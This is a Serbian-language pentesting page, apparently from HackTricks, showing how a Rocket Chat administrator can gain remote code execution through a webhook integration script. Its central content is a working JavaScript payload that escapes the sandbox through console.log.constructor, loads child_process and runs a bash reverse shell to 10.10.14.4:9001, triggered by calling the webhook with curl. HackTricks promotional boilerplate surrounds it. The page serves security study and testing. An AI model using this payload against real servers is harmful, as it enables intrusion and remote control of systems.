Rocket Chat

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJATELJSTVO!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Websec | Uw Cybersecurity Specialist

RCE

Ako ste admin unutar Rocket Chat-a možete dobiti RCE.

Idite na Integrations i izaberite New Integration i izaberite bilo koji: Incoming WebHook ili Outgoing WebHook.
/admin/integrations/incoming

Prema dokumentaciji, oba koriste ES2015 / ECMAScript 6 (u osnovi JavaScript) za obradu podataka. Dakle, dobijamo rev shell za javascript kao:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Konfigurišite WebHook (kanal i post kao korisničko ime moraju postojati):

Konfigurišite WebHook skriptu:

Sačuvajte promene
Dobijte generisani WebHook URL:

Pozovite ga sa curl-om i trebalo bi da primite reverznu ljusku

Websec | Uw Cybersecurity Specialist

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu Proverite PLANOVE ZA PRIJAVU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousPython NextSpecial HTTP headers

Last updated 3 days ago